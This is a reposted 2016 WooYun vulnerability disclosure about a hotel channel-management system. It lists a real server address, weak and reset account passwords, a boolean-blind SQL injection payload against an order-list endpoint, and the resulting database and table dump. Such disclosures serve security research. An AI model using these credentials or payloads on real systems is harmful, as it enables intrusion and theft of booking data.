畅联某酒店系统漏洞修改任意酒店价格信息/查询订单/重置任意用户账号/上千万敏感信息

admin
admin
admin
139580
文章
114
评论
2017年3月17日07:08:38评论430 views字数 239阅读0分47秒阅读模式
摘要

2016-03-15: 细节已通知厂商并且等待厂商处理中
2016-03-16: 厂商已经确认,细节仅向厂商公开
2016-03-26: 细节向核心白帽子及相关领域专家公开
2016-04-05: 细节向普通白帽子公开
2016-04-15: 细节向实习白帽子公开
2016-04-30: 细节向公众公开

漏洞概要 关注数(1) 关注此漏洞

缺陷编号: WooYun-2016-184982

漏洞标题: 畅联某酒店系统漏洞修改任意酒店价格信息/查询订单/重置任意用户账号/上千万敏感信息

相关厂商: chinaonline.net.cn

漏洞作者: 保护伞

提交时间: 2016-03-15 21:06

公开时间: 2016-04-30 13:43

漏洞类型: 应用配置错误

危害等级: 高

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 配置错误

0人收藏

漏洞详情

披露状态:

2016-03-15: 细节已通知厂商并且等待厂商处理中
2016-03-16: 厂商已经确认,细节仅向厂商公开
2016-03-26: 细节向核心白帽子及相关领域专家公开
2016-04-05: 细节向普通白帽子公开
2016-04-15: 细节向实习白帽子公开
2016-04-30: 细节向公众公开

简要描述:

CHINAonline畅联是专业的酒店营销渠道管理软件及直连技术服务提供商,由北京中长石基信息技术股份有限公司(简称:石基信息-深圳A股代码002153)全资运营。CHINAonline畅联利用其基于云架构的专业技术为酒店和酒店集团及其在线营销渠道(如:淘宝旅行、搜索引擎等直销平台,订房中心、商务公司、旅行社、批发商等分销渠道)提供一站式渠道管理和开放的系统无缝直连。
北京中长石基信息技术股份有限公司(简称石基信息)是一家业界领先专为酒店业、餐饮业提供整体IT解决方案的高科技公司,是国内外知名酒店管理集团及其管理的酒店信息系统主要的产品供应商和技术服务商。客户包括洲际、万豪、雅高、喜达屋、希尔顿、香格里拉酒店、锦江、首旅、金陵、万达、开元集团等。目前为中国6,000多家酒店和50,000多家餐厅提供IT解决方案和服务

详细说明:

code 区域 
http://www.chinaonline.net.cn/
 畅联渠道管理系统
 http://120.55.138.95/
 test 123456
 重置的账户:
 LJJIN 123456

畅联某酒店系统漏洞修改任意酒店价格信息/查询订单/重置任意用户账号/上千万敏感信息

畅联某酒店系统漏洞修改任意酒店价格信息/查询订单/重置任意用户账号/上千万敏感信息

畅联某酒店系统漏洞修改任意酒店价格信息/查询订单/重置任意用户账号/上千万敏感信息

畅联某酒店系统漏洞修改任意酒店价格信息/查询订单/重置任意用户账号/上千万敏感信息

畅联某酒店系统漏洞修改任意酒店价格信息/查询订单/重置任意用户账号/上千万敏感信息

漏洞证明:

畅联某酒店系统漏洞修改任意酒店价格信息/查询订单/重置任意用户账号/上千万敏感信息

畅联某酒店系统漏洞修改任意酒店价格信息/查询订单/重置任意用户账号/上千万敏感信息

畅联某酒店系统漏洞修改任意酒店价格信息/查询订单/重置任意用户账号/上千万敏感信息

code 区域 
注入:
 http://120.55.138.95/order_list.do (POST)
 soc.hotelId=4b2446362dd9420083b599c51176be61&soc.orderNo=&soc.guestName=&soc.pmsId=&soc.checkinStart=&soc.checkinEnd=&soc.channelCode=&soc.checkoutStart=&soc.checkoutEnd=&soc.restype=&soc.createStart=&soc.createEnd=&jumpPageNo=1&pageCount=0&jumpPageNo=1&pageCount=0
 
 Parameter: soc.guestName (POST)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: soc.hotelId=4b2446362dd9420083b599c51176be61&soc.orderNo=&soc.guestName='or'1'='1') AND 2753=2753 AND ('XpoJ'='XpoJ&soc.pmsId=&soc.checkinStart=&soc.checkinEnd=&soc.channelCode=&soc.checkoutStart=&soc.checkoutEnd=&soc.restype=&soc.createStart=&soc.createEnd=&jumpPageNo=1&pageCount=1&jumpPageNo=1&pageCount=1
     Vector: AND [INFERENCE]
 ---
 back-end DBMS: MySQL 5
 available databases [8]:
 [*] information_schema
 [*] mc
 [*] mc0
 [*] mc1
 [*] mc2
 [*] mc3
 [*] mysql
 [*] performance_schema
 
 Database: mc
 +-----------------------------+---------+
 | Table                       | Entries |
 +-----------------------------+---------+
 | rsvtype                     | 12785626 |
 | logdetail                   | 8646285 |
 | room_rate_0716              | 5752246 |
 | rsvtype_0423                | 5460046 |
 | rsvtype_channel             | 4325687 |
 | restriction_calc            | 2016586 |
 | adsmessage_err              | 1376937 |
 | room_package                | 1217968 |
 | loginfo                     | 1062122 |
 | rate_amount                 | 737045  |
 | restriction_calc_0423       | 721330  |
 | room_rate                   | 671792  |
 | master_rate                 | 511728  |
 | smssend                     | 463855  |
 | master_order                | 382029  |
 | master                      | 382019  |
 | mastersendlog               | 366877  |
 | rate_detail                 | 266882  |
 | codelistmapping             | 227706  |
 | channel_goods               | 165134  |
 | master_cancel               | 144684  |
 | room_rate_0716bak           | 117184  |
 | rate_plan_i18n              | 87831   |
 | import_channel              | 76052   |
 | import_channel2             | 75710   |
 | rsvtype_bak20140805         | 66119   |
 | room_type_i18n              | 53573   |
 | userrole                    | 51456   |
 | import_codemapping          | 48802   |
 | rate_custom_relationship    | 32253   |
 | room_type                   | 30516   |
 | rate_guarantee_relationship | 29543   |
 | import_detail               | 26556   |
 | channel_hotel               | 23350   |
 | hotel_guarantee_i18n        | 20947   |
 | hotel_guarantee             | 17854   |
 | hotel_i18n                  | 11113   |
 | custom                      | 10853   |
 | overbookinggroup            | 9337    |
 | rate_plan                   | 9320    |
 | import_customer             | 8989    |
 | rate_package                | 8116    |
 | import_guarentee2           | 7897    |
 | import_guarentee            | 7668    |
 | import_room                 | 6922    |
 | import_room_i18n            | 6922    |
 | rate_cancel_relationship    | 6721    |
 | city                        | 6130    |
 | hotel_cancel_i18n           | 5790    |
 | raterestriction             | 5168    |
 | hotel_cancel                | 4866    |
 | hotel_package_i18n          | 4635    |
 | import_rate2                | 4200    |
 | hotel_package               | 4118    |
 | import_rate                 | 4107    |
 | import_rate_i18n2           | 4078    |
 | import_rate_i18n            | 3986    |
 | employee_i18n               | 3242    |
 | b2buser                     | 3233    |
 | employee                    | 3233    |
 | master_package              | 2862    |
 | hotel                       | 2701    |
 | master_profile              | 2659    |
 | receivepmslog               | 2472    |
 | dictcode_i18n               | 1866    |
 | picture                     | 1853    |
 | import_rate_package2        | 1401    |
 | import_rate_package         | 1385    |
 | `date`                      | 1199    |
 | param_interface_i18n        | 1146    |
 | import_cancel2              | 992     |
 | import_cancel               | 977     |
 | dictcode                    | 954     |
 | constant                    | 925     |
 | param_interface             | 563     |
 | special_offer_i18n          | 533     |
 | import_hotel_i18n           | 521     |
 | import_hotel                | 516     |
 | import_base                 | 250     |
 | rate_plan_template_i18n     | 230     |
 | rate_plan_template          | 218     |
 | import_delete               | 208     |
 | menuurl                     | 198     |
 | special_offer               | 162     |
 | package_i18n                | 138     |
 | room_type_template_i18n     | 134     |
 | cancel_policy_i18n          | 119     |
 | rolemenu                    | 112     |
 | package                     | 111     |
 | room_type_template          | 109     |
 | guarantee_policy_i18n       | 102     |
 | menu_i18n                   | 97      |
 | import_witbj                | 94      |
 | import_special              | 89      |
 | master_pay                  | 81      |
 | dictionary_i18n             | 76      |
 | import_dy_package           | 53      |
 | menu                        | 50      |
 | cancel_policy               | 47      |
 | role                        | 47      |
 | feed_back                   | 41      |
 | dictionary                  | 39      |
 | dynamic_package             | 36      |
 | taobaoorder                 | 32      |
 | guarantee_policy            | 26      |
 | channel                     | 25      |
 | chain_i18n                  | 20      |
 | smstemplate                 | 19      |
 | market_i18n                 | 16      |
 | source_i18n                 | 14      |
 | rate_package_bak            | 13      |
 | position_i18n               | 12      |
 | guestroom                   | 10      |
 | room_package_bak1           | 10      |
 | roomquota                   | 10      |
 | market                      | 9       |
 | brand_i18n                  | 7       |
 | ratepms                     | 6       |
 | `position`                  | 5       |
 | chain                       | 4       |
 | rsvtype_online              | 4       |
 | orderdownloadlog            | 3       |
 | source                      | 3       |
 | brand                       | 2       |
 | chainannelrateidmapper      | 2       |
 | onlineuser                  | 2       |
 | rsvtypedetail               | 2       |
 +-----------------------------+---------+

修复方案:

rt

版权声明:转载请注明来源 保护伞@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-16 13:43

厂商回复:

文中提及代码注入问题,我司已在月前修正,经测当前版本不存在类似问题。同时,所暴露出来的弱密码问题,将在技术和管理两方面进一步加强。对于乌云网的关注和提醒,再次表示感谢。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin